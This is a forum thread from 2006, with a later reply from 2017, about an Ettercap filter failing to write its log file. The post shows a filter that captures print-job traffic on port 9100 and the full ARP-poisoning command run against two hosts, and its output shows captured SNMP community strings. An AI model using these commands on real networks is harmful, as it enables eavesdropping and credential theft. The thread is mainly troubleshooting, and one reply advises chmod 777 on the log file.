-
March 6th, 2006, 10:30 PM
#1
Ettercap Filters Error "filter engine: Cannot open file ./logfile.log"
I've asked this on Ettercap's forum, but anyone who has visited there knows its mostly filled with spam ads for porn and pharmaceuticals. I've also tried to Google for "ettercap filters" but my tutorials are are the first things to come up. So, here I ask you guys.
I'm pretty sure the filter I wrote should work, but I always get the error "filter engine: Cannot open file ./logfile.log" Below is a printout of the code and all of the error messages. Any ideas on what is wrong? It's a Debian box I'm working on. Thanks.
Code:
ig:~# cat printsnarf.filter
if (ip.proto == TCP && tcp.dst == 9100) {
log(DATA.data, "./logfile.log");
}
ig:~#
ig:~# etterfilter printsnarf.filter -o ps.ef
etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file 'printsnarf.filter' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'ps.ef' done.
-> Script encoded into 6 instructions.
ig:~# ettercap -Tq -F /root/ps.ef -M arp /192.168.22.33/ /192.168.22.193/
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from /root/ps.ef...
Listening on eth0... (Ethernet)
eth0 -> 00:E0:B8:30:4B:6C 192.168.30.130 255.255.240.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.22.33 00:60:B0:6D:47:C6
GROUP 2 : 192.168.22.193 00:11:43:BF:AF:57
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
SNMP : 192.168.22.33:161 -> COMMUNITY: public INFO: SNMP v1
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
SNMP : 192.168.22.193:1122 -> COMMUNITY: public INFO: SNMP v1
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
filter engine: Cannot open file ./logfile.log
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.
ig:~#
-
March 7th, 2006, 05:11 AM
#2
Senior Member
i'm not shure what youre talking bout...
but... what about using an absolute path like '/tmp/logfile.log' ???
-
March 7th, 2006, 05:12 AM
#3
-
March 7th, 2006, 05:46 AM
#4
Senior Member
if error only occurs using your "printsnarf.filter"
pls let us have a look (on_it)
-
March 7th, 2006, 05:48 AM
#5
I cated out the code above, but here it is again:
Code:
if (ip.proto == TCP && tcp.dst == 9100) {
log(DATA.data, "./logfile.log");
}
-
March 7th, 2006, 06:47 AM
#6
I don't know how helpful this is, but I've seen similar problems with files locking on apache servers. If ettercap is writing to that logfile.log is may not allow your filter to be accessing the data from that file at the same time. I don't know how that applies here though because it seem like the filter would be allowed access to that file.
If not that, is it possible to just bypass that ./logfile.log and log your filter directly to DATA.data? (again, not familiar with all workings of ettercap)
"Experience is the hardest teacher, it gives the test first and the lesson after." Anonymous
-
March 7th, 2006, 03:12 PM
#7
Originally posted here by The_Captain
If not that, is it possible to just bypass that ./logfile.log and log your filter directly to DATA.data? (again, not familiar with all workings of ettercap) [/B]
That's not really how Ettercap works with filters, as best as I can tell from what little documentation thre is it should work as it is.
-
March 7th, 2006, 04:30 PM
#8
While this does not answer your question Irongeek, I found just one other site, besides your tuts that have some helpful information on ettercap:
http://securitypronews.com/securityp...andBeyond.html
While not an expert on this, what you have in your code should work. I will see if I can find something else and also bounce this it off a few peoples.
Just to ask the stupid question:
1. Do you need to "touch" the logfile.log before running Ettercap?
\"We\'re the middle children of history.... no purpose or place. We have no Great War, no Great Depression. Our great war is a spiritual war. Our great depression is our lives. We\'ve all been raised by television to believe that one day we\'ll all be millionaires and movie gods and rock stars -- but we won\'t. And we\'re learning slowly that fact. And we\'re very, very pissed off.\" - Tyler (Brad Pitt) Fight Club.
-
November 1st, 2017, 07:16 AM
#9
Junior Member
Ettercap failures to log
This worked for me:
"touch" the file first, as recommended;
chmod + 777 on the log file to make sure etterfilter can write to it.
Good luck!
Originally Posted by genXer
While this does not answer your question Irongeek, I found just one other site, besides your tuts that have some helpful information on ettercap:
http://securitypronews.com/securityp...andBeyond.html
While not an expert on this, what you have in your code should work. I will see if I can find something else and also bounce this it off a few peoples.
Just to ask the stupid question:
1. Do you need to "touch" the logfile.log before running Ettercap?
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|